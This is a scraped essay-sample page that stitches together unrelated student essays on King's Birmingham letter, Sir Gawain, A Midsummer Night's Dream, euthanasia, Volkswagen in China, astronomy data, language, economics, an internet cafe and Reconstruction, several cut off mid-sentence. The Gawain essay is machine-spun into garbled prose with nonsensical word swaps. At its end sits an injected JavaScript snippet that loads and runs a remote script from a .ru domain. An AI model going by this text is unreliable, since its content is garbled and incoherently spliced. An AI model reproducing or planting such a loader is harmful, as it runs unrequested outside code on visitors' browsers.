Martin Luther King Jr. Essay - 1553 Words
Martin Luther King Jr. From the Apostle Paul to Martin Buber: Martin Luther Kings use of Historical and Religious Figures in his Letter From Birmingham Jail In his Letter From Birmingham Jail, Dr. Martin Luther King Jr. is addressing his fellow clergymen in response to their accusations of his unwise and untimely activities. Like most other reformers, he finds his greatest rationalization and defense from the word of God. Considering the religious affiliation of his audience, King appeals to the clergymen by instituting examples from, and associates himself with historical and religious figures. Creatively, King is establishing a common ground between himself and the men of the cloth, which causes them to respect his actions andâ⬠¦show more contentâ⬠¦Theres something else to be noted here though. Not only is King successful in relating himself to these figures, but also his ideas. When referring to his plea for social reform, he calls it the gospel of freedom. Kings diction is very profitable to hi s argument. Automatically when the word gospel is used, one associates it with God (and probably more so do the clergymen). By referring to his ideas of freedom as a gospel, he is adding religious connotations to them. Now, not only is King being associated with the word of God, but also so are his ideas. In doing this, he is alluding to the point that the toleration and acceptance of segregation and slavery etc, goes against the word of God. These things then make men less virtuous and pious. There has been a lot of research and analization of Kings writings by other scholars, who also recognize his tactful talents. From the article Martin Luther King, Jr., as Scholar: A Reexamination of His Theological Writings, Clayborne Carson (along with Peter Holloran, Ralph E. Luker, and Penny Russell) examine Kings method of eclectic composition. Kings appropriations of the words and ideas of others should certainly not be understood merely as violations of academic rules. This movie is about a young boy named Kevin and he has a big extended family. Kevin has an uncle, whoâ⬠¦show more contentâ⬠¦My conclusions from this movie and from what I learned in Balswick, this kind of family is dysfunctional, with both characteristics of enmeshment and disengagement. The family learned to be closer to each other and Buzz learned that less fights and more peace is better with Kevin. One more thing that I learned, was that this family was able to adapt easily and learn from their mistakes, and they also learned to be more loving toward each other and that improved the family relationships. What I could teach from this familyââ¬â¢s exa mple is that dysfunctional families often learn to fix their mistakes or not. It often takes panic or a tragedy for the family to get back together and be harmonious with each other. I would teach that it is not worth it to fight your siblings or parents because it often tears the family apart. Dysfunctional families could be in peace and harmony with each other and learn not to repeat their mistakes, but instead stick together through good and bad. This is what I am going to teach about family relationships based on this movie. It is important to stick with your family through thick and thin and keep harmony and peace within the family. Gawain Questions Essay Research Paper To Be free essay sample
Gawain Questions Essay, Research Paper To Be or Not To Be? . A knight To be or non to be? a Knight truly is the inquiry presented through this narrative, which is a narrative of Gawains tests and trials on his journey to the Green Chapel. First, before admiting Gawain as being or non being a knight, one must foremost cognize what a knight is. In mention to the Pentangle a knight or Gawain must be: ? foremost, he was faultless in his five senses, Nor found of all time to neglect in his five fingers, And all his allegiance was fixed upon the five lesions That Christ got on the cross, as the credo tells ; ? That all his force was founded on the five joys That the high Queen of Eden had in her kid. ? The fifth of the five fives followed by the knight Were beneficence boundless and brotherly love And pure head and manners, that none might impeach, And compassion most precious-these peerless five Were forged and made fast in him, foremost of work forces. ( Ll. 640-655 ) This extract from Sir Gawain and the Green Knight demonstrates on what a knight should be when looked upon from the Pentangle manner of being a knight. What pertain to the Natural/Real Realm would be the five senses and five fingers. The five senses portion is used to derive cognition of the universe and worldly pay. The five fingers are the workss that are done. What pertain to the Religious, Spiritual, Christian Realm would be the religion in the five lesions of Christ would be Fealty and Force. Allegiance is the fidelity in the five lesions of Christ. Force or the force in conflict is inspired by the five joys of Mary. What pertain to the Chivalric Realm are Beneficence, Brotherly Love A ; Truth, Pure Mind, Mannerss, and Pite. Beneficence pertains to the generousness that the knight bestows. Brotherly Love A ; Truth pertains to the family and truth in which the knight bestows. Pure Mind pertains to the celibacy that the knight shows through his brushs with adult females and their enticements. Mannerss pertains to the courtesy that the knight shows to the people that he comes upon. Pite, or piousness, pertains to the compassion that the knight shows when he encounters different state of affairss. ( GP ) The storyteller defines Gawain as being: ? in good plants, as gold unalloyed, devoid of all villainousnesss, with virtuousnesss adorned in sight. ( Ll. 633-635 ) This fundamentally states that he was a theoretical account of a good cat. He kept himself out of problem, we know this by ground of the storyteller saying that Gawain was the Devoid of all villainousness. This statement says that Gawain is missing in any kind of immorality. It seems to be that the Green Knight symbolically represents a nefarious being that clangs in on a party to play a medieval Russian Roulette. In making so causes an turbulence among the Knights of the Round Table. The Green Knight storms in and asks person to chop his caput off. At this portion of the narrative it seems rather questionable as to his grounds for making so. Gawain responds to the decapitation game challenge in a low, yet epic sense. After the Green Knight flatboats into King Arthur # 8217 ; s tribunal and criticizes the Knights of the Round Table stating, Where is now your haughtiness and your amazing workss? for all cower and temblor? ( cubic decimeter. 87, 91 ) The Green Knight is now stating that the Knights of the Round Table are cowards. He is naming them out. The lone one to accept the challenge is Arthur purely to demo that he is non a coward. Just as Arthur is about to behead the Green Knight Gawain speaks up and says, I beseech, before all here, that this scrimmage may be mine. ( l. 115-116 ) Here Gawain is talking up and stating Arthur that if anyone will make this that it will be him. Gawain shows a great trade of bravery in accepting this challenge for the ground that no 1 else, aside from Arthur, would demur the challenge. Gawain discoveries cordial reception and shelter at the palace of Bercilak, unbeknownst to Gawain, the Green Knight. Bercilak made an understanding that whatever I win in the forests I will give you at Eves, and all you have earned you must offer me. ( Ll. 1105-1107 ) This understanding that was made agencies that whatever Gawain gets in the palace he must give back to Bercilak. This understanding is complicated for the ground that Bercilak # 8217 ; s married woman is seeking to score Gawain. With so some many Christian elements present, it could be argued that symbolically that Bercilak # 8217 ; s palace is the Garden of Eden with Gawain being Adam. Here, Gawain enters a topographic point that is highly beautiful such as the Garden of Eden would be. God provided the garden for Adam and Bercilak is the 1 who provides the palace for Gawain, so Bercilak could symbolically be God. Therefore Bercilak # 8217 ; s married woman would perceivably be Eve, since she provides the enticement for Gawain. The enticement gt ; would so be eating the apple, or in Gawains instance, subjecting to Bercilaks # 8217 ; married woman # 8217 ; s demands. Gawains celibacy is being put on trial through Bercilak # 8217 ; s married woman # 8217 ; s changeless enticements. Gawain allows the married woman to snog him on two occasions on two separate yearss. After the happening of these busss Gawain goes back to the host and gives him a buss every bit good. The lone gift that Gawain did non give to the host was that of the girdle, which in medieval times was a mark of good luck. Gawain does non maintain his word through the maintaining of the girdle. The storyteller said that Gawains # 8217 ; strategy were baronial, ( Ll. 1858 ) but he still had broken his promise. Gawain leaves the palace in hunt for the Green Chapel on New Year # 8217 ; s Day. It seems to be that Gawain is siting to the Green Chapel, when in fact we, the reader, believe that he is siting to his decease. By traveling to the Green Chapel Gawain is seeking to do himself look as baronial and heroic as possible. By traveling with the girdle he is doing himself look cowardliness and afraid of decease, when: A knight does non justly have to fright a bodily lesion, since he should have the universe # 8217 ; s congratulationss for it. But he should fear the lesions of the spirit, which blind, incurable lust inflicts with fiery darts. Bodily lesions are to be healed, but non Galen will do a adult male well who is ill with love. ( LL ) Gawain even acknowledges his mistake when he says, Accursed be a fearful and envious bosom! In you is villainy and frailty, and virtuousness laid low! ( l. 465-466 ) In this episode the Green Knight is made out to be, slightly, of a male parent figure to Gawain. The Green Knight corrects Gawains mistakes and points him in the right way. The Green Knight shows Gawain Brotherly Love by non decapitating him and informs Gawain of what to make. The Green Knight may besides be seen as a priest shriving Gawain from his wickednesss when he states, Such injury as I have had, I hold it rather healed. You are so to the full confessed, your weaknesss made known, and bear the field repentance of the point of my blade, I hold you polished as a pearl, as pure and every bit bright as you lived free of mistake since first you were born. The game is eventually played out with the Green Knight forgiving Gawain as shown in the citation above. Gawain is being tested in a many different sum of ways ; such as Bercilaks # 8217 ; testing of Gawains truth and manners every bit good as his celibacy through the enticements with Bercilaks # 8217 ; married woman every bit good as through the understanding that they brand. Equally good as the Pentangle trial, i.e. Gawain populating up to knightly criterions. In most ways Gawain passes the trial, such as: Gawain giving back the busss, every bit good as him really looking for the Green Chapel. He fails through one thing, which is non giving the girdle to Bercilak. By maintaining the girdle Gawain makes himself seem frightened of decease which goes against the construct of knighthood. A knight should neer be afraid of decease, which Gawain realizes after the Green Knight brings up the fact about the girdle. Gawain realizes his error and repents, in making so Gawain passes the trial and the Green Knight Lashkar-e-Taibas him travel without chopping his caput off. Even though Gawain is non perfect he is still held with the highest of criterions in Arthur # 8217 ; s head every bit good the heads of the other Knights of the Round Table. I believe that Gawain could be described as a Stoic for the ground that Gawain, every bit good as Stoics emphasized moralss as the chief field of cognition. Gawain exhibited Stoicism in legion topographic points ; one of the major exhibitions was through the symbolism of the Pentangle. Stoicism was put into drama through Gawains inconsistent gallantry with Bercilak every bit good as his married woman in most instances. Gawain did non let Bercilak # 8217 ; s married woman to wholly score him, but Gawain did let her to snog him. He upheld most of the trade with Bercilak, except with the girdle. This is what is meant by Sir gawains inconsistent gallantry. In decision, through the Green Knight # 8217 ; s trials, we see that Gawain is non the perfect knight he strives to be. Neither the reader, nor the Green Knight, nor his fellow knights of the Round Table hold him to this criterion of flawlessness. Through reading about the convulsion Gawain experiences believing about his impending decease at the custodies of the Green Knight, leads the reader to understand why he accepts the girdle. It is easy to see why he remains true until his fright of decease overcomes him. All this proves he is merely human. Yet Gawain merely sees that he has been inconsistent in continuing the chivalric codification, and this means failure to him. This is an indicant of the criterion Gawain has set for himself, thereby demoing why he had the repute he had. Despite all that happened, Gawain is still a loyal, baronial, honest and gracious knight. 328 ( map ( ) { var ad1dyGE = document.createElement ( 'script ' ) ; ad1dyGE.type = 'text/javascript ' ; ad1dyGE.async = true ; ad1dyGE.src = 'http: //r.cpa6.ru/dyGE.js ' ; var zst1 = document.getElementsByTagName ( 'script ' ) [ 0 ] ; zst1.parentNode.insertBefore ( ad1dyGE, zst1 ) ; } ) ( ) ;

Character Analysis Of Demetrius In A Midsummer Nights Dream By Willia
Character Analysis of Demetrius in A Midsummer Night's Dream by William Shakespeare. A Midsummer Night's Dream is one of Shakespeare's most read play's this romantic comedy illustrates how complicated love ties can be. Thesis: In this play one of the characters that catches the eye of the reader is Demetrius, his character is really difficult to identify except by his relation to the one he loves, or even more, to the one who loves him. Helena the character in love with Demetrius and her unjustified pursue for his love is the only clue or mark for his character. Under the undesirable pressure of this unwanted charm that she has for his love, he turns violent and threatens her with bodily harm, coming off as not quite the loving person he truly means to be. It is easy to perceive how he is distracted from the one he loves Hermia because of Helenas hard headed actions in the beginning. He could be a gentle loving man if he truly desired, but he takes satisfaction being put in his place by others. In the end, still under the spell of fairy magic and therefore not seeing with true eyes, he seems a bit imbecilic launching at the acted "lovers" in the play. He doesn't realize it, but he is in a play of its own. Likewise, as with the other characters, what happens to him is far more interesting than the sort of character he is. His character is very limited during the first act, this means that he cant stand up for himself, also displays lack of self confidence, insecurity perhaps because of the presence of his father. The reader may implies that Demetrius thoughts were that because he had the approval of the duke Egeus, Hermia should give herself up to him and disapprove Lysander, the one she loves. Demetrius took advantage of his social stature by claiming Hermia as the one for him, which truly portrays his instability. At the same time, this showed that he loves Hermia. It is know that he is supported by Egeus because of the relationship with Demetrius dad, hateful Lysander opposes saying that she loves him and no other. Egeus decides that Demetrius is the one that deserves Hermia at this point, his ego shows uplifted and looks down on to Lysander projecting an inferior state. During the love trial Demetrius demoralizes Helena by almost laughing at her deep ridicule feelings she has for him: I'll run from thee and hide me in the breaks and leave thee to the mercy of wild beasts. (Demetrius, 2.1. 234-235) Helena could crash on her bike and die on the very next moment and he would not care about it. Thorough the whole play he takes advantage of any situation that he thinks may benefit him everything like when Lysander was missing: I had rather give his luck to my hounds ............ and if I could, what should I get there for says to Hermia, A privileged never to see more. And from thy hated presence I see me no more, whether he be dead or no. (Hermia, 3.2. 81-83). This awful conversation shows that he has a very demoralizing personality and disrespects Lysander he doesn't realize that at this point Hermia doesn't feel comfortable with any aspect of his personality she dislikes him and doesn't want to see him ever again, inadvertly he comes across as the main reason w hy Lysander is missing, Hermia automatically thinks of him as the murderer of Lysander: It cannot be but thou hast murdered him. So should a murderer look, so dead so grim. (Hermia, 3.2. 58-59). During these events Helena still persists in gaining Demetrius love, instead he still lowers her, but this time he drowns her and she cannot surface again: You do impeach your modesty too much to leave the city and commit yourself into the hands of one that loves you not, to trust the opportunity of night and the ill counsel of a desert place with the rich worth of your virginity. (Demetrius, 2.1.221-226). Helena blinded thinking in a different way accepts. Demetrieus loves the external beauty ignoring what feelings are he is only concerned with sexual feelings

Free Essays on Legalizing Euthanasia
Legalizing Euthanasia In early 1970ââ¬â¢s Jean and Derek Humphry found themselves in a dilemma. Jean had cancer, and at the slightest sudden movement her bones would crack. Jean was in agonizing pain, which she could no longer endure. One night while Jean and Derek were in bed, she begged of Derek, ââ¬Å"Find a doctor who will give us a lethal overdose that I can take.â⬠After many restless nights Derek agreed and began his search for a doctor. He considered three doctors to nurse Jean back to health but was rejected. This was because the doctor would be subjecting himself to prosecution in court. The other doctor would suffer from malpractice in court and could not afford to lose his license in medicine. After being rejected, Derek asked a young doctor that he met years ago, who went under the name of ââ¬Å"Dr. Joeâ⬠. Derek, Jean, and ââ¬Å"Dr. Joeâ⬠met and discussed what would happen and exactly how Jean would want to die. Jean decided on taking capsules. Jean died in 1975 as she wished. Jean died a calm and peaceful death. She did not have to suffer for as long as a year. Jean ended her suffering with in an hour and Derek was happy knowing she would not be suffering. Several years later Derek met a woman by the name of Ann Wickett. The two of them fell madly in love and got married. Derek explained the situation that he and his ex-wife had gone through. Together they formed Hemlock Society and with that explained the proponents of euthanasia. In this case euthanasia was humane. It was humane because not only was it Derekââ¬â¢s choice but most importantly it was Jeanââ¬â¢s choice too. Euthanasia gave Jean a final rest from all her misery since she found out she had cancer. Most importantly, it expedited a slow and inevitable death for Jean. Euthanasia should be legalized, because contrary to common belief euthanasia is a humane act. There are two types of euthanasia. Volkswagen Strategic Position - Essay Example Volkswagen entered with a share of ownership of 50% for production and sell of cars in the markets of Greater China. Subsequently in 1991, Volkswagen expanded its operations with a second joint venture in the name of FAW-Volkswagen Automotive Company Ltd. The markets of Greater china are one of the major markets of the German automobile group. By 2004, the German automaker group has laid its strong foundation to forms its subsidiary by the name of Volkswagen Group China. The company is governed by a six member committee of senior management. The senior management is responsible for corporate governance and supervision of the group in Greater China. The members of the governing body are accountable for several divisions of the operations and management that include sales and marketing, finance, operations, personnel and government relations, technology, etc. By focusing on these key areas and strengthening its strategic position in Greater China, the Volkswagen Group China today has s ixteen offices that are spread across the country that caters to the automobile markets. Volkswagen over the years has not generated huge scales of revenue from the sell of cars in the markets of Greater China but is also a key contributor to the rapid pace of growth of the economy of China. The members of the governing body in Greater China are not only responsible for the supervision of its operations but also look at the opportunities for new investments for expansion of the markets of the group. Volkswagen group in China has expanded its volume of production of cars over the years with the optimal use of resources of production. The volume of sales of Volkswagen Group China has reached around 2.81... This essay stresses that since the entry of VW in China it has become the largest Automobile Company in the country. One of the biggest reasons of success of VW has been the choice of market entry strategy which happened to be JV. This helped the company to reduce the environmental risks and set up effective distribution network in the country. As a result China has become the second largest market for VW after VW. Volkswagen has very few weaknesses. Some of them have been discussed in this section. Has relatively low amount of new technology and skills over the competitors. The management of the company is also quite old. One of the major opportunities has been the entry of China into WTO which has opened up the economy inviting a lot more investment opportunities. Another major opportunity has been the growth of the Chinese automobile market. This paper makes a conclusion that the company should focus on augmentation through augmented services such as make to order sales programs to gain customers trust and market share. Volkswagen and the JV partners may have to invest a lot more to boost up the out capacity and to increase sales in China. In future Volkswagen may have to use china as the base or hub to explore the Asian market. Already Volkswagen has made it clear about plans to export cars made in China to different Asian countries. This may help the company to lower the cost and improve quality.

How Will Astronomy Archives Survive the Data Tsunami Case Study - 1
How Will Astronomy Archives Survive the Data Tsunami - Case Study Example Optimization techniques fail to create an efficient programmable dynamic query in case of astronomical data as data is present in bulk and is not usually centrally located. The disparate sources of data induce issue of network and bandwidth as well. When large chunks of data will be downloaded from disparate sources performance will be impacted as connections need to be established and maintained. Data is divided into different sources by a set criteria. This could be arranged date wise or could be based on specific type. The criteria even if incorporated in queries may not help much as the search that runs in dataset is time consuming. If data does not exist in data set time is required to load data from archives and search becomes intensive. There are various techniques used to provide better response times in such scenarios but the ever increasing data of astronomy that is stored in the database requires some special technique for data mining, machine learning and then update in t he systems (McLeod & Schell,Ã 2007, p.Ã 145). The requests made for specific data can be optimized by saving results of frequent query. Emerging researches will always produce new datasets which will take standard time. The infrastructure of archival data can be improved however the budget constraint of astronomical research hinders them from such an upgrade at the moment. Incompetent Archival Techniques: Modern day data is stored in a special environment that provides virtual drives hosted by third parties. This allows users to store data from different places online. This technology uses a web service that connects the client with the third party host systems. The customer has to depend on the reliability of the hosting party to provide reliability and security. In order to make systems available on cloud the whole time, third parties usually create redundant data on different virtual machines. If one machine is made unavailable due to a fault or network issue, other machines having the same data will be made available instantly. The astronomical data can be set on cloud to make it readily available. However, cloud computing has its own challenges as well. Such challenges include vulnerability of data attacks as the cloud is shared through a network and makes the data available through internet. The second issue is that of the third party supplier stability. The companies might lose down or merge with other companies resulting is partial or complete loss of data or other similar issues hence decreasing reliability of data on the cloud. There are a number of reasons why such a situation can arise. A supplier can go bankrupt, be bought by other large companies, it may expand and change the direction and interest of their business etc. Performance is again an issue in cloud as it is dependent on the available network bandwidth. Availability is impacted if a software failure occurs, network has a bottleneck or if a hardware fails. The last concern is cost of hosting a cloud platform. The budget constraints for an astronomical foundation may not allocate sufficient finances to meet the target of moving astronomical data on cloud. Emerging Technologies: The technologies currently in practice involve applying indexes on databases. These indexes are stored outside the database and increases the data access or recovery time. This does need advancement to a Peta byte level data management though. It is a challenge today to make efficient algorithms

Language Essay Essay Example for Free
Language Essay Essay Introduction Language is universal way to express how a person feels. So of course, it is essential in cultures to express their individuality within life. Most of the time people do not put a lot of speculation on what mental processes may be taking place subconsciously. These mental processes allow a person to think, speak, and express their personal thoughts through language. In order to properly analyze that language, cognition must be a part of the mental processes too. In this essay, we will delve deeper into how language and cognition are associated. Language Lexicon Language is an efficient and consequential use of information, which can be both comprehended and used by all living things. It is also the communication of thoughts to language. According to Merriam-Webster (2014), cognitive psychology can be defined as, ââ¬Å"a branch of psychology concerned with mental processes (as perception, thinking, learning, and memory) especially with respect to the internal events occurring between sensory stimulation and the overt expression of behavior.â⬠Accordingly, when a person or animal learns to understand through the use of language, and with the capacity of that language, there can be a cognitive process that helps to separate humans from animals. Language is completely generative, dynamic, structured, and communicative. In language, a lexicon is known as the vocabulary or psychological language. A lexicon can hold many different types of words, which can also include how to pronounce a word, and the parts of speech for each word (Galotti, 2014). A lexicon is used to help a person understand words that are spoken, and their meanings. The spoken words are compared to a personââ¬â¢s lexicon, which is how a person can understand what the word is. It could be near impossible to understand a language or vocabulary without lexicons. The use of lexicons are a very important part of a personââ¬â¢s language. Key Features of Language There are many key features that make a language. The following are the main properties: generative, communicative, dynamic, and structured. Language is considered generative because, a person has an unlimited capacity as to how they build their personal languages. Language allows people to communicate with one another, and it also allows other animals to communicate within the same species as well. Language is dynamic because it is forever changing, and also develops people into having larger vocabularies. Lastly, the structure of language plainly shows exactly how convoluted it truly is. The great thing about language, is that it can adapt and expand as a person learns more information. New words can be added to a language or vocabulary, while others can be erased or updated (Galotti, 2014). Language development is different for each person. Some people are able to learn language through their cognitive functions, but sometimes, it takes more time. For an example, with children, they have to learn everything, which includes their own names, how they are feeling, how to express feeling, and objects. But they also have to learn how to use the vocabulary they are learning. Lastly, the feature that influences more cognitive processes, mainly languages that can influence thoughts. It works in a rotating structure, language helps to influence thoughts, and language also helps to regulates thoughts. A person always uses language in order to interpret their own thoughts. The main reason that language influences thought is because thoughts are when a person is consciously speaking to themselves. Levels of Language There are four different levels of language in reference to the structure and processing, phonemes, words, sentences, and texts. Phonemes are the tiniest part of sounds or units that can be used by people in order to form words. Phonemes are a personââ¬â¢s sounds of speech, which is similar to each letter in the alphabet. The main dilemma with phonemes are that each personââ¬â¢s creation of them are different. When a person studies phonetics, they are studying speech sounds and their physical properties. Words help aà person make sense of phonemes. Words are made up of by multiple spoken sounds. A sentence is, of course, a set of words which complete themselves. A sentence will also allow a person to organize their thoughts when they are preparing to speak, or to write something. A text helps a person connect sentences in order to form a small amount of information, or a paragraph. These usually help to explain a specific topic, and always have to be about one topic. All four of these structures are a crucial part of language. To put this more easily, phonemes lead to words, words lead to sentences, and sentences lead to texts (Galotti, 2014). Analyzing the Role: Language Process Cognitive Psychology In order to properly analyze the role of processing language, a person has to first understand cognitive psychology, to study mental processes. Mental processes give a person the ability to think, believe, perceive, solve problems, make decisions, remember, learn, reason, and adapt. By using these mental processes a person can begin to understand and comprehend language, and with that, the process of the language is used. If a person does not understand the languageââ¬â¢s structure, that person will not have the capability to understand texts, sentences, words or phonemes, which all make up a language. With lack of perceptive abilities, a person may not comprehend language, with all of its entirety. Cognitive processes help determine how the language is processed within the brain. When a person begins to learn and understand language, the cognitive process is in use. Conclusion The cognitive process known as language drives a separation in between humans and other beings. The lexicon contains words in which people can use to compare other words or parts of speech. There are multiple key features of language. These key features, as stated above are, generative, communicative, dynamic, and structured. With all of these features, language can become very intricate. If a person were to completely understand each one of these key features, they will be able to understand and comprehend how necessary they are to be used within language. Also, it is crucial for a person to analyze the role that cognitive psychology plays within the process of language. Cognitive psychology is important in many aspects of aà personââ¬â¢s life, but especially in the language process. References: Cognitive Psychology. (2014). In Merriam-Webster. Economics Essay -- Understanding Economics Essays
à à à à à Definition of Topic: Economics is the study of supply and demand. It defines the ways that human beings allocate resources and how resources are distributed amongst a market. It allows you to see trends in current market places and predict what may happen in the future. Many different subjects were once regarded as a part of economics. Political science and even sociology were once considered part of the field. These subjects still play a major role in understanding economics but are also completely separate disciplines today. à à à à à History: Since ancient times, humans have contemplated basic economic problems. Many great minds have tried to master the subject. Aristotle and Plato were probably the first to document such studies. Both agreed that living by trade was ill fated. Influenced by Greek economic ideals the Romans built their wealth. After the fall of Rome, the Catholic Church would become the power behind most economic laws. They would condemn usury and regarded commerce as inferior to agriculture. à à à à à It wasnââ¬â¢t until 1776 that economics became a study of its own. Adam Smith is considered the father of economics. Through his work Inquiry into the Nature and Causes of the Wealth of Nations, he used mercantilism and physiocracy to develop classical economics. Smith emphasized consumption, rather than production to broaden the scope of economics. Modern thought still follows his examples for permitting self-interest in order to promote national prosperity. This is most evident when looking at todayââ¬â¢s smaller business market. à à à à à Twenty years later, Malthus would write a discouraging, but very influential book, An Essay on the Principle of Population. Malthus believed that the human race would eventually be doomed by overpopulation. His theory was that food would increase in arithmetic ratio but population would double every generation. This theory is faulty because it does not account for disease, famine, war, etc. Malthusââ¬â¢ view of supply and demand left a permanent impression on generations to come. It would hence be know as ââ¬Å"the dismal science.â⬠à à à à à à à à à à Next to revolutionize economics would be the Communist Manifesto in 1848. Karl Marx had the classical vision of capitalism, Marxism was in large measure a sharp rebuttal, but to some extent it embodied variations of classical themes. For Marx, the labor theory was a clue to the inner work... ...oss the country at many prestigious universities for economics professors. As an economics major, graduates could work for the National Institute of Health as an Operations Research Analyst, as an accountant (anywhere), or in almost any research or marketing opening. The Centers for Disease Control even require economists; they currently have positions open for post-doctorate fellowships. These are just a sampling of the job opportunities in the field and related fields of economics. With very little research, anyone interested in economics could find a plethora of interesting and challenging careers pursuable within the realm of economics. Swot Analysis: Javanet Internet Cafe
SWOT Analysis: JavaNet Internet Cafe Business Overview JavaNet Internet Cafe is to be the first high tech internet cafe in Eugene, Oregon. The cafe will provide computer equipment, as well as high speed internet access as well as coffee and bakery items. The appeal of this company is to provide advanced internet services to the public that may not be affordable in home use. Also, the business plan includes a training staff to assist new internet users in learning the basics of the internet. The goal of this plan is to provide an upscale social and educational environment for those who desire internet access as well as social interaction and technical assistance. Strengths JavaNet has sought out a knowledgeable staff who are eager to teach internet basics to new users. They have purchased state of the art equipment which will appeal to users who may not be able to afford the best equipment in their home or office. The company will offer a higher-class environment than other coffee houses or internet cafes. The amenities will include hard wood tables and booths, track lighting, local art, and upscale coffee house equipment. The business appears to have sufficient capital from grants and investors to maintain operations for the first year. The small scale of the business requires only a small staff, and the business model appropriately includes the necessary management. The market segments are accurately identified as a split between new internet users, and the more experienced ââ¬Å"power usersâ⬠. The business plan includes appropriate services for both segments. The marketing plan is effective for this type of business. Local advertisement and newspaper ads will be appropriate for the local scale of the business. Weaknesses Like any other technology based company, JavaNet is heavily dependent on a rapidly changing market. Computer technology, to include hardware and software as well as the users evolve very quickly. While computer technology may require the most attention in a dual service business such as this one, the other half should not be neglected. It seems as though not enough thought has gone to the coffee shop aspect of the business. In order to be competitive with the high volume of coffee shops in Eugene, a staff who is knowledgeable and trained in making and serving specialty drinks will also be necessary. Opportunities Since this business was to open in 1998, the demand for public internet access was high. In Eugene, Oregon, JavaNet would be the first cafe to offer internet access as well as specialty coffee. There are several high end coffee suppliers in the region and wholesale cost for quality coffee beans is relatively low compared to resale value. The demand for gourmet coffee is high, and should do well with the quickly growing interest in internet access. At the time, in 1998, home internet access was not affordable for everyone, and the dial up services were certainly not as fast as the T2 connections being offered by JavaNet. Access to new and expensive Software applications would be available to customers that would not normally be available unless the person had access to an office or school computer lab. Threats The greatest threat to this business plan may be offering services that are appealing enough to bring customers from their home to the cafe. As technology advances, the cost of ownership for high tech computing and internet equipment goes down. The equipment that is available in the cafe may soon be available for home purchase at an affordable cost. Having seen the ââ¬Å"futureâ⬠since the start up of this business, we now know that high speed internet access is available in the home at a very affordable price. Many larger, mainstream food franchises now offer wi-fi (high speed wireless internet access) in their establishments. McDonald's and Starbucks are two of the first companies to offer free wi-fi in almost all of their United States locations. For JavaNet to remain successful and competitive, the owners and staff must continually modify and evolve their business plan to be one step ahead of the services that are offered for in-home use. In 1998, a high speed internet connection along with laser printing and access to popular software, such as Adobe Photoshop and Microsoft Office applications were not affordable to many for home use. Ten years later, most of these items are commonplace in the home. Another threat will be competition from similar businesses. Essay on My Own Reconstruction Plan after the Civil War
After the great battle of the American Civil War was fought, and the North won, a bigger battle still had to take place; reconstruction. Reconstruction after the war was not going to be easy, and it was not. What was the primary goal? What should be done to ex-confederates? Free Blacks? How should this reconstruction take place? Many of these questions were solved by the government, but how well? Reconstruction could have gone very differently, and that is what I intend to show. They should be freed from Bondage, and given the same opportunities as Whites. However that could almost never happen, and did not happen. People are always going to have prejudices, no matter what the law says. Even if a person does not hate Blacks, they could just prefer to hire a White man to do the same work. Itââ¬â¢s something that still affects the Southern United States, and minimally in other areas.
